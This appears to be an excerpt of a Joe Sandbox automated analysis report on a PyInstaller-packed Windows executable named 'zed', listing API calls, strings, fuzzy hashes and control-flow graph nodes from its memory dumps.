                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5302C50: MessageBoxW.USER32 ref: 00007FF7E5302D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                                • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                                • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                • Instruction ID: 100900d00b5892d50d0281dbc2ed8d846ed9936b674f87526e75a881f75721cf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E217151B28A4A51FA21B724E8303B6E254AFA8F5CFC0413BE65DC25D5EE3CE104C762

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 846 7ff7e531ba5c-7ff7e531ba82 847 7ff7e531ba9d-7ff7e531baa1 846->847 848 7ff7e531ba84-7ff7e531ba98 call 7ff7e5314ee8 call 7ff7e5314f08 846->848 850 7ff7e531be77-7ff7e531be83 call 7ff7e5314ee8 call 7ff7e5314f08 847->850 851 7ff7e531baa7-7ff7e531baae 847->851 864 7ff7e531be8e 848->864 870 7ff7e531be89 call 7ff7e531a8e0 850->870 851->850 853 7ff7e531bab4-7ff7e531bae2 851->853 853->850 856 7ff7e531bae8-7ff7e531baef 853->856 859 7ff7e531bb08-7ff7e531bb0b 856->859 860 7ff7e531baf1-7ff7e531bb03 call 7ff7e5314ee8 call 7ff7e5314f08 856->860 862 7ff7e531bb11-7ff7e531bb17 859->862 863 7ff7e531be73-7ff7e531be75 859->863 860->870 862->863 868 7ff7e531bb1d-7ff7e531bb20 862->868 867 7ff7e531be91-7ff7e531bea8 863->867 864->867 868->860 871 7ff7e531bb22-7ff7e531bb47 868->871 870->864 874 7ff7e531bb7a-7ff7e531bb81 871->874 875 7ff7e531bb49-7ff7e531bb4b 871->875 879 7ff7e531bb83-7ff7e531bbab call 7ff7e531d5fc call 7ff7e531a948 * 2 874->879 880 7ff7e531bb56-7ff7e531bb6d call 7ff7e5314ee8 call 7ff7e5314f08 call 7ff7e531a8e0 874->880 877 7ff7e531bb4d-7ff7e531bb54 875->877 878 7ff7e531bb72-7ff7e531bb78 875->878 877->878 877->880 883 7ff7e531bbf8-7ff7e531bc0f 878->883 907 7ff7e531bbc8-7ff7e531bbf3 call 7ff7e531c284 879->907 908 7ff7e531bbad-7ff7e531bbc3 call 7ff7e5314f08 call 7ff7e5314ee8 879->908 911 7ff7e531bd00 880->911 886 7ff7e531bc8a-7ff7e531bc94 call 7ff7e532391c 883->886 887 7ff7e531bc11-7ff7e531bc19 883->887 899 7ff7e531bc9a-7ff7e531bcaf 886->899 900 7ff7e531bd1e 886->900 887->886 888 7ff7e531bc1b-7ff7e531bc1d 887->888 888->886 892 7ff7e531bc1f-7ff7e531bc35 888->892 892->886 896 7ff7e531bc37-7ff7e531bc43 892->896 896->886 901 7ff7e531bc45-7ff7e531bc47 896->901 899->900 905 7ff7e531bcb1-7ff7e531bcc3 GetConsoleMode 899->905 903 7ff7e531bd23-7ff7e531bd43 ReadFile 900->903 901->886 906 7ff7e531bc49-7ff7e531bc61 901->906 909 7ff7e531bd49-7ff7e531bd51 903->909 910 7ff7e531be3d-7ff7e531be46 GetLastError 903->910 905->900 912 7ff7e531bcc5-7ff7e531bccd 905->912 906->886 916 7ff7e531bc63-7ff7e531bc6f 906->916 907->883 908->911 909->910 918 7ff7e531bd57 909->918 913 7ff7e531be48-7ff7e531be5e call 7ff7e5314f08 call 7ff7e5314ee8 910->913 914 7ff7e531be63-7ff7e531be66 910->914 915 7ff7e531bd03-7ff7e531bd0d call 7ff7e531a948 911->915 912->903 920 7ff7e531bccf-7ff7e531bcf1 ReadConsoleW 912->920 913->911 924 7ff7e531bcf9-7ff7e531bcfb call 7ff7e5314e7c 914->924 925 7ff7e531be6c-7ff7e531be6e 914->925 915->867 916->886 923 7ff7e531bc71-7ff7e531bc73 916->923 927 7ff7e531bd5e-7ff7e531bd73 918->927 929 7ff7e531bd12-7ff7e531bd1c 920->929 930 7ff7e531bcf3 GetLastError 920->930 923->886 934 7ff7e531bc75-7ff7e531bc85 923->934 924->911 925->915 927->915 936 7ff7e531bd75-7ff7e531bd80 927->936 929->927 930->924 934->886 939 7ff7e531bda7-7ff7e531bdaf 936->939 940 7ff7e531bd82-7ff7e531bd9b call 7ff7e531b674 936->940 941 7ff7e531be2b-7ff7e531be38 call 7ff7e531b4b4 939->941 942 7ff7e531bdb1-7ff7e531bdc3 939->942 948 7ff7e531bda0-7ff7e531bda2 940->948 941->948 945 7ff7e531be1e-7ff7e531be26 942->945 946 7ff7e531bdc5 942->946 945->915 949 7ff7e531bdca-7ff7e531bdd1 946->949 948->915 951 7ff7e531be0d-7ff7e531be18 949->951 952 7ff7e531bdd3-7ff7e531bdd7 949->952 951->945 953 7ff7e531bdd9-7ff7e531bde0 952->953 954 7ff7e531bdf3 952->954 953->954 955 7ff7e531bde2-7ff7e531bde6 953->955 956 7ff7e531bdf9-7ff7e531be09 954->956 955->954 957 7ff7e531bde8-7ff7e531bdf1 955->957 956->949 958 7ff7e531be0b 956->958 957->956 958->945
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                                • Instruction ID: d2781520b90a71f27c1c5f3420668853d4a4cf068877cf5b1039c476463c40e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18C1272292C68E81E6606B2595703BDB750FBA1FC8FD5413BEA4D83391CE7CE4458732

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                • Instruction ID: 2f4da7848e3ff7c21b034aa1708361f3142a99996cba92fdb869ab8c67aa1022
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68217531A1CB4A41EA10AB55B56032AE3A4FF95BA8F90023AE66C83BD4DFBCD4458711

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308570: GetCurrentProcess.KERNEL32 ref: 00007FF7E5308590
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308570: OpenProcessToken.ADVAPI32 ref: 00007FF7E53085A3
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308570: GetTokenInformation.KERNELBASE ref: 00007FF7E53085C8
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308570: GetLastError.KERNEL32 ref: 00007FF7E53085D2
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308570: GetTokenInformation.KERNELBASE ref: 00007FF7E5308612
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7E530862E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7E5308570: CloseHandle.KERNEL32 ref: 00007FF7E5308646
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF7E5303C55), ref: 00007FF7E530916C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,00007FF7E5303C55), ref: 00007FF7E5309175
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                • Instruction ID: 3fc559be85ca8cc64efa504a04ee8dbd4ba725b193ad2711e3e9131d264fb4e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67216125A28B4941E614BB10E4353EAE295FFA4B48FC4443BEA4DC3796DF3CD4458761

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?,00007FF7E530352C,?,00000000,00007FF7E5303F23), ref: 00007FF7E5307F32
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                • Opcode ID: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                                                                                                                                                                • Instruction ID: f02ebf469918e0295a1ff5bee76d5b440925ed16ce473455fc5761db84316425
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9023beffec3a57a4629e8abb22503f1b718fcdb28fa34784c50d465fb9ddbb72
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A31EE21639BC945E621A711E4303A6A354EF94FECF800236EE6D877C5DF3CD5458721
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E531CF4B), ref: 00007FF7E531D07C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7E531CF4B), ref: 00007FF7E531D107
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                • Instruction ID: a4e2c6e37301536c4b0134a3564121994c2c8ddadef0a455aae862728b099cf5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6911732E2865945F760AF7585603BCABA0AB61F8CF94403FDE4E97684CF38D442C322
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                • Instruction ID: fabcf89f1e65c06e8a9d0bc2ce4a00f4248e30d73b0ae71ac6fd3258e33a0977
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37512A76F2411986EB14EF748B7137CA751AB2476CF90423EDD1E92AD5DF3CA4028721
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                                • Instruction ID: cceaa76ba90ecba665e5687b450d9ab91ac473c56440aa01b01db9d3b10722ef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4151A222F246458AF710EF71D5603BDB7A1AB68F5CF50453ADE0D87688DF38D4408B22
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                • Instruction ID: 34fd93c7192e263c164f6e196ebcb250716ea5c63d461096324182dc56bb9c62
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A41CD22D2878583E7109B31D660379B360FB75B68F50933AD65C83AD1DF7CA0E08B51
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3251591375-0
                                                                                                                                                                                                                                                • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                • Instruction ID: ba05bbd77bc287c932f1a3f831a5fb0b67f055f186ed387303eb340c8d562b0d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB310B21E6864E41EA54BB6495723B9E6829F61F8CFC4443ED60DC72D3DE3CA4058373
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                • Instruction ID: 71dce93501ccbd7b0a068473c7ada2b330497087a7149d8ca8e09932fed2d49e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC512B25B2924987E724B975962077AE181BF54FACF88473BDD6C873C5CE3CE4018622
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.4732533580.00007FF7E5301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E5300000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732256392.00007FF7E5300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4732804708.00007FF7E532B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E533E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733002679.00007FF7E5342000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.4733288009.00007FF7E5344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_7ff7e5300000_zed.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                • Instruction ID: bccc08b9415a41b8c732dd54f7ac2058fda284327664fad41a58deec39507c57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC110821628A5981DA209B25B920269E351AB51FF8F944336EF7D877D4CF7CD0008701
                                                                                                                                                                                                                                                APIs
